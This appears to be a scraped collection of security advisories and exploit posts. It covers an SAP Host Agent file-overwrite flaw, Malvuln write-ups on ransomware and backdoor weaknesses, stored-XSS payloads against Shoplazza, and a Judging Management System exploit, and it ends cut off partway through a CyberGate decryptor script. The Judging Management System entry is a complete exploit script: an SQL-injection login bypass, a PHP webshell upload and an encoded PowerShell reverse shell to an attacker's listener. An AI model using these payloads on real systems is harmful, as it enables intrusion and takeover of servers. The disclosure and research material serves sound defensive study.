/usr/sap/tmp/coll.put<br />secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saposcol -k<br />-----------------------------------------------------------------------<br /><br />After termination of the main saposcol process, the file /etc/passwd<br />containing essential user account information is overwritten by current<br />data in the shared memory segment.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions of the binaries were found to be vulnerable<br />during our tests:<br /><br />- SAP Host Agent 721 (patch no. 42)<br /> SAPOSCOL version COLL 22.11 721 - v2.42 (patch no. 1214)<br />- SAP Host Agent 722 (patch no. 54)<br /> SAPOSCOL version COLL 22.11 722 - v2.49 (patch no. 1113)<br /><br />According to the vendor the following releases and versions<br />are affected by the discovered vulnerabilities:<br /><br />- SAPHOSTAGENT 7.22<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-02-22: Contacting vendor through vulnerability submission web form.<br />2022-02-23: Vendor confirms receipt and assigns internal ID #2280075571.<br />2022-03-02: Vendor asks for additional information on file system permissions.<br />2022-03-03: Providing required information via encrypted PGP mail.<br />2022-03-09: Vendor asks for additional information on file system permissions.<br />2022-03-10: Providing required information via encrypted PGP mail.<br />2022-03-30: Vendor accepts vulnerability and states that a fix is in progress.<br /> The initially submitted CVSS assessment 7.8 (LLLN|U|HHH) is disagreed<br /> with. A new vector string/score 6.7 (NLHN|U|LHH) is proposed by the<br /> vendor.<br />2022-04-04: Providing detailed explanation for initially submitted CVSS score<br /> and CVSS vector string. No answer received.<br />2022-06-14: Requesting update.<br />2022-06-28: Vendor informs that the security note is expected to be released at<br /> September Patchday 2022.<br />2022-09-10: Vendor informs about upcoming release of the patch and registration<br /> of CVE number.<br />2022-09-13: Vendor releases patch with SAP Security Note 3159736. The corresponding<br /> CVE possess a CVSS vector string/score of 6.7 (NLHN|U|LHH).<br />2022-12-13: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br />Patches are available in form of SAP Security Notes which can be accessed<br />via the SAP Customer Launchpad [1]. More information can also be found in<br />the Official SAP Security Patchday Blog [2].<br /><br />The following Security Note needs to be implemented: 3159736<br /><br />[1] https://launchpad.support.sap.com/#/securitynotes<br />[2] https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10<br /><br /><br />Workaround:<br />-----------<br />Remove write access to the DIR_PERF (e.g. /usr/sap/tmp) directory for <sid>adm<br />account. Note that this change may interfere with other programs such as CCMS.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg / @2022<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5559e9f5e1645f8554ea020a29a5a3ee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Ransom.Win64.AtomSilo<br />Vulnerability: Crypto Logic Flaw<br />Family: AtomSilo<br />Type: PE64<br />MD5: 5559e9f5e1645f8554ea020a29a5a3ee<br />Vuln ID: MVID-2022-0666<br />Disclosure: 12/14/2022<br />Description: AtomSilo ransomware FAILS to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample.<br /><br />E.g. <br /><br />Test.exe.docx<br />Test.exe.pdf<br /><br />Tested successfully in a virtual machine environment.<br /><br /><br />PoC Video:<br />https://www.youtube.com/watch?v=xyBt9Ppb-xc<br /><br />Exploit/PoC:<br />Create files with ".exe" within the filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Backdoor.Win32.InCommander.17.b<br />Vulnerability: Hardcoded Cleartext Credentials<br />Family: InCommander<br />Type: PE32<br />MD5: dd76d8a5874bf8bf05279e35c68449ca<br />Vuln ID: MVID-2022-0665<br />Dropped files: incsrv.exe<br />Disclosure: 12/14/2022<br />Description: The malware listens on TCP port 9400 and 9401 and requires authentication. However, the username "IncUser-b3" is stored in cleartext in a file named "incsrv.drv" under Windows dir. The password "InClientMainPassword" is also stored in cleartext but within the PE file "incsrv.exe" at offset 000958d0.<br /><br />Third-party adversaries may then upload thier own executables using ftp PASV, STOR commands.<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 9401<br />220 InCommad FTP Server ready.<br />USER IncUser-b3<br />331 Password required for IncUser-b3.<br />PASS InClientMainPassword<br />230 User IncUser-b3 logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,241,155).<br />CDUP \<br />250 CWD command successful. "C:/" is current directory.<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=61851<br />DOOM="DOOM_SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Shoplazza 1.1 - Stored Cross Site Scripting<br /># Exploit Author: Andrey Stoykov<br /># Software Link: https://github.com/Shoplazza/LifeStyle<br /># Version: 1.1<br /># Tested on: Ubuntu 20.04<br /><br /><br />Stored XSS #1:<br /><br />To reproduce do the following:<br /><br />1. Login as normal user account<br />2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"<br />3. Select "Title" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8<br />[...]<br /><br />{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]<br /><br /><br />// HTTP GET request to trigger XSS payload<br /><br />GET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=UTF-8<br />[...]<br /><br /><meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover"><br /><title>Title"><script>alert(1)</script></title><br /><meta name="keywords" content="test1205"><br />[...]<br /><br /><br />Stored XSS #2:<br /><br />To reproduce do the following:<br /><br />1. Login as normal user account<br />2. Browse "Products" -> "Create Product"<br />3. Select "Subtitle" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />POST /admin/api/admin/v2_products HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"product":{"id":"","title":"Title","brief":"Subtitle\"><script>alert(1)</script>","description":"<p>Description</p>"[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8<br />[...]<br />{"product":{"brief":"Subtitle\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e","category_id":"","collections<br />[...]<br /><br /><br />Stored XSS #3:<br /><br />To reproduce do the following:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Announcement"<br />3. Select "Text" section and enter payload "><script>alert(1)</script><br />4. Select "Mobile Text" section and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442430617951435468/temp-template-datas/061cf44d-f20e-42f4-9cde-54a74f240fef/sections/announcement HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />{"section":{"type":"announcement","settings":{"enable_view_all":true},"blocks":[{"type":"announcement","settings":{"text":"Announcement\"><script>alert('Announcement')</script>","mobile_text":"Mobile Text\"><script>alert('Mobile Text')</script>\n","countdown_time":1,"link":null,"link_text":"Shop now"}},{"type":"announcement","settings":{"text":"Welcome to our store","mobile_text":"Welcome to our store","countdown_time":1,"link":null,"link_text":"Shop [...]<br /><br /><br /><br />Stored XSS #4:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product" <br />3. Select "Subheading" and enter payload "><script>alert(1)</script><br />3. Select "Heading" and enter payload "><script>alert(1)</script><br />4. Select "Text" and enter payload "><script>alert(1)</script><br />5. Select "Button Text" and enter payload "><script>alert(1)</script><br />6. Select "Label" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664528667835 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>",<br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=UTF-8<br />[...]<br />{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>"<br />[...]<br /><br /><br />Stored XSS #5:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product Carousel" <br />3. Select "Heading" and enter payload "><script>alert(1)</script><br />4. Select "Description" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529790755 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":"product_carousel","cname":{"en-US":"Products carousel","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"icon":"oss/operation/cbff8870e3db05817270bcb0e8c52870.svg","display":true,"settings":{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script><br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=UTF-8<br />[...]<br />{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>"[...]\">Product Description\"><script>alert('Product Description')</script><br />[...]<br /><br /><br /><br />Stored XSS #6:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Text with Icons" -> "Free Shipping"<br />3. Select "Heading" and enter payload "><script>alert(1)</script><br />4. Select "Text" and enter payload "><script>alert(1)</script><br />5. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Free Shipping" Worldwide Shipping"<br />6. Select "Heading" and enter payload "><script>alert(1)</script><br />7. Select "Text" and enter payload "><script>alert(1)</script><br />8. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Member Discount"<br />9. Select "Heading" and enter payload "><script>alert(1)</script><br />10. Select "Text" and enter payload "><script>alert(1)</script><br />11. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Icon"<br />12. Select "Heading" and enter payload "><script>alert(1)</script><br />13. Select "Text" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529794334 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>"<br />[...]<br /><br /><br />// HTTP response showing unsanitized XSS payload <br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=UTF-8<br />[...]<br />{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>"[...]"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script><br />[...]<br /><br /><br />Stored XSS #7:<br /><br />1. Login as normal user account<br />2. Browse "Online Store" -> "Themes" -> "Customize" -> "Review Flow"<br />3. Select "Title" and enter payload "><script>alert(1)</script><br /><br /><br />// HTTP POST request showing XSS payload<br /><br />PATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1670588315547 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script><br />[...]<br /><br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=UTF-8<br />[...]<br />{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>"<br />[...]<br /></code></pre>
<pre><code># Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)<br /># Date: 12/11/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 on XAAMP server<br /><br /><br />import requests,argparse,re,time,base64<br />import urllib.parse<br />from colorama import (Fore as F,Back as B,Style as S)<br />from bs4 import BeautifulSoup<br /><br /><br />BANNER = """<br />╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗<br />║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║<br />╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝<br /><br />"""<br /><br />def argsetup():<br /> desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'<br /> parser = argparse.ArgumentParser(description=desc)<br /> parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)<br /> parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)<br /> parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)<br /> args = parser.parse_args()<br /> return args<br /><br /># Performs Auth bypass in order to get the admin cookie<br />def auth_bypass(args):<br /> print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")<br /> session = requests.Session()<br /> loginUrl = f"{args.target}/login.php"<br /><br /> username = """' OR 1=1-- -"""<br /> password = "randomvalue1234"<br /> data = {'username': username, 'password': password}<br /><br /> login = session.post(loginUrl,verify=False,data=data)<br /> admin_cookie = login.cookies['PHPSESSID']<br /> print(F.GREEN+"[+] Admin cookies obtained !!!")<br /> return admin_cookie<br /><br /># Checks if the file has been uploaded to /uploads directory<br />def check_file(args,cookie):<br /> uploads_endpoint = f"{args.target}/uploads/"<br /> cookies = {'PHPSESSID': f'{cookie}'}<br /> req = requests.get(uploads_endpoint,verify=False,cookies=cookies)<br /> soup = BeautifulSoup(req.text,features='html.parser')<br /> files = soup.find_all("a")<br /> for i in range (len(files)):<br /> match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))<br /> if match:<br /> file = files[i].get('href')<br /> print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)<br /> return file<br /> <br /> <br /> return None<br /><br />def file_upload(args,cookie):<br /> now = int(time.time())<br /> endpoint = f"{args.target}/edit_organizer.php"<br /> cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}<br /> get_req = requests.get(endpoint,verify=False,cookies=cookies)<br /> soup = BeautifulSoup(get_req.text,features='html.parser')<br /> username = soup.find("input",{"name":"username"}).get('value')<br /> admin_password = soup.find("input",{"id":"password"}).get('value')<br /> print(F.GREEN + "[+] Admin username: " + username)<br /> print(F.GREEN + "[+] Admin password: " + admin_password)<br /> <br /> <br /> # Multi-part request<br /> file_dict = {<br /> 'fname':(None,"Random"),<br /> 'mname':(None,"Random"),<br /> 'lname':(None,"Random"),<br /> 'email':(None,"ranom@mail.com"),<br /> 'pnum':(None,"014564343"),<br /> 'cname':(None,"Random"),<br /> 'caddress':(None,"Random"),<br /> 'ctelephone':(None,"928928392"),<br /> 'cemail':(None,"company@mail.com"),<br /> 'cwebsite':(None,"http://company.com"),<br /> 'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),<br /> 'username':(None,f"{admin_password}"),<br /> 'passwordx':(None,f"{admin_password}"),<br /> 'password2x':(None,f"{admin_password}"),<br /> 'password':(None,f"{admin_password}"),<br /> 'update':(None,"")<br /> }<br /> <br /> req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)<br /><br /><br />def exploit(args,cookie,file):<br /> payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """<br /> uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"<br /> cookies = {'PHPSESSID': f'{cookie}'}<br /> print(F.GREEN + "\n[+] Enjoy your reverse shell ")<br /> requests.get(uploads_endpoint,verify=False,cookies=cookies)<br /> <br /> <br /><br />if __name__ == '__main__':<br /> print(F.CYAN + BANNER)<br /> args = argsetup()<br /> cookie=auth_bypass(args=args)<br /> file_upload(args=args,cookie=cookie)<br /> file_name=check_file(args=args,cookie=cookie)<br /> if file_name is not None:<br /> exploit(args=args,cookie=cookie,file=file_name)<br /> <br /> else:<br /> print(F.RED + "[!] File not found")<br /> <br /></code></pre>
<pre><code># Exploit Title: Judging Management System v1.0 - Authentication Bypass<br /># Date: 12/11/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows 10 on XAAMP server<br /><br /># Vulnerability: An attacker can bypass login page and access to dashboard page<br /># Vulnerable file: login.php<br /># Exploit:<br /><br />1) Go to: http://localhost/php-jms/index.php<br />2) As username use this payload: 'or 1=1-- -<br />3) Use random words for password<br /><br /><br />POST /php-jms/login.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 37<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/php-jms/index.php<br />Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />username=%27or+1%3D1--+-&password=asa<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/618f28253d1268132a9f10819a6947f2.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br />Backup media: infosec.exchange/@malvuln<br /><br />Threat: Trojan-Dropper.Win32.Decay.dxv (CyberGate v1.00.0)<br />Vulnerability: Insecure Proprietary Password Encryption<br />Family: CyberGate<br />Type: PE32<br />MD5: 618f28253d1268132a9f10819a6947f2<br />Vuln ID: MVID-2022-0664<br />Disclosure: 12/11/2022<br />Description: This well known RAT malware stores credentials using a proprietary insecure encryption routine in its "Settings.ini" file. The recovery procedure is trivial to decrypt stored credentials. theres no key, xor or combined encrypt mechanism and relies on basic SUB, ADD and bitwise operations SHR and SHL. Analysis of the following single encrypted character table reveal the pattern 0,G,W,m that repeats every few alpha-numeric characters a-c, d-g, h-k etc...<br /><br />E.g.<br /><br />a=OG<br />b=OW<br />c=Om<br />d=P0<br />e=PG<br />f=PW<br />g=Pm<br />h=Q0<br />i=QG<br />j=QW<br />k=Qm<br />l=R0<br />m=RG <br />n=RW <br />o=Rm <br />p=S0 <br />q=SG <br />r=SW <br />s=Sm <br />t=T0 <br />u=TG <br />v=TW <br />w=Tm <br />x=U0 <br />y=UG <br />z=UW <br /><br /><br />"Settings.ini" <br />senhaconexao=OM9Z<br /><br />For example, the password "abc" is stored as "OM9Z", in order to recover the first character we need only perform the following bitwise operations SUB, ADD, SHR and SHL. <br /><br />OM9Z = "abc"<br /><br />To recover the first password character, use the first two stored values "OM" which will return the ascii value "a".<br /><br />key="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"<br /><br />get 'a'<br /><br /> b="PQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"<br /> eax = len(key) - len(b)<br /> eax<br />25<br /> ebx = eax -1<br /> ebx<br />24<br /> b="NOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"<br /> ecx = len(key) - len(b)<br /> ecx<br />23<br /> edx = ecx -1<br /> edx<br />22<br /> ebx << 6<br />1536<br /> hex(1536)<br />'0x600'<br /> hex(22)<br />'0x16'<br /> 0x600 + 0x16<br />1558<br /> hex(1558)<br />'0x616'<br /> 0x616 >> 4<br />97<br /> hex(97)<br />'0x61'<br /><br />61 = 'a'<br /><br /><br />PoC Video:<br />https://www.youtube.com/watch?v=PAkKo2dLGwQ<br /><br />Exploit/PoC:<br />"CyberGate_Trojan_Decryptor.py"<br /><br />import argparse, sys, time, os, atexit<br />from operator import *<br /><br />#CyberGate v1.00.0 - Insecure Proprietary Password Encryption<br 